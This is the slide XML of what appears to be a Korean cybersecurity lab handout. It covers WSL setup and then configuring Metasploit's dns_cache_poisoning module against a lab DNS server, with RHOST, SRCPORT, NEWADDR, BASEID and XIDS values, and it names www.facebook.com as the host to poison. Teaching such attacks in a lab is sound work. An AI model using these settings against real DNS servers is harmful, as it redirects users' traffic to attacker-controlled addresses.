              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Downloads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cyber_homework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/Terminal/WindowsTerminal.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 찾는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>관리자 권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>WindowsTerminal.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 실행시킨다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 쳤을 때 다음과 같은 화면이 나오면 정상적으로 설치가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>완료된것</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상단의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>아래화살표</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>표시 를 눌러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>우분투를 선택한다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4AAD2511-9613-4BCC-8F3E-90550F86C777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="524256" y="771503"/>
            <a:ext cx="5240817" cy="1851681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="그림 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89A5ABF6-39CF-4279-BAAA-6AA337B56D83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="524256" y="3950829"/>
            <a:ext cx="5314359" cy="1210523"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="직사각형 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B377DF6-33F2-48FC-8B86-49AD975E5C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1610782" y="4387238"/>
            <a:ext cx="799637"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 name="그림 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0DE02D0-5512-4A78-8AED-0872D678CD3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6334046" y="1460341"/>
            <a:ext cx="5314359" cy="1483632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="직선 화살표 연결선 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6C11DB7-E081-482A-A3FA-43A37B91764E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6851599" y="1627632"/>
            <a:ext cx="902513" cy="15483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16821"/>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공격 모듈의 옵션 확인</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show options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공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정</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SET RHOST 10.10.1.14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; SET SRCPORT 33333</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 상위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의를 보낼 때 사용하는 포트 번호</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오염 대상 호스트 설정</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SET HOSTNAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; SET NEWADDR 10.10.1.99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위에서 설정한 호스트의 가짜 주소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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답 설정</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SET BASEID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: BASEID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 획득한 마지막 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 사용하면 되며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>진수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>진수로 변환하여 입력해야 함</a:t>
            </a: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ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E8097B-8C3D-442B-8ED1-2581D6C7C4B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="915609"/>
            <a:ext cx="5400040" cy="1963166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="표 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A219C35E-2B5A-41E0-B9DE-21029DB24664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209942005"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500498" y="2994214"/>
          <a:ext cx="5327904" cy="1970024"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1129030">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2999008096"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2854198">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1789836265"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1344676">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1681651181"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="234696">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이름</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설명</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예제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61585921"/>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BASEID</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주입할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응답의 시작 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>ID</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47295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1545366"/>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HOSTNAME</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오염시킬 호스트 이름</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www.facebook.com</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61724997"/>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NEWADDR</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오염시킬 호스트의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>주소</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10.10.1.99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9938112"/>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RHOST</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공격 대상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IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>주소</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10.10.1.14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4320646"/>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SRCPORT</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공격 대상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서버의 질의 소스 포트</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33333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8156104"/>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UPDNS</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상위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서버의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>주소</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10.10.1.99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1804968"/>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XIDS</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주입할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응답의 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50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7962063"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E26FD0EF-3009-4A90-B435-BDB0F900E760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899976" y="5871331"/>
            <a:ext cx="4528947" cy="377952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A99B5C-D928-4A0A-96BF-CF9A187E93DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6644524" y="920628"/>
            <a:ext cx="4693920" cy="350520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DB08161-BA26-4517-B8E0-D14C0116B4F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355930" y="2279044"/>
            <a:ext cx="5237480" cy="395605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7C0E58-0353-456E-ACDB-61AF1BF57C84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314517" y="3484743"/>
            <a:ext cx="5376985" cy="395604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E5C108-18AC-4D52-B6E8-E7368C80E379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355930" y="4806406"/>
            <a:ext cx="4508627" cy="362712"/>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75079995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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; SET XIDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주입할응답수</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
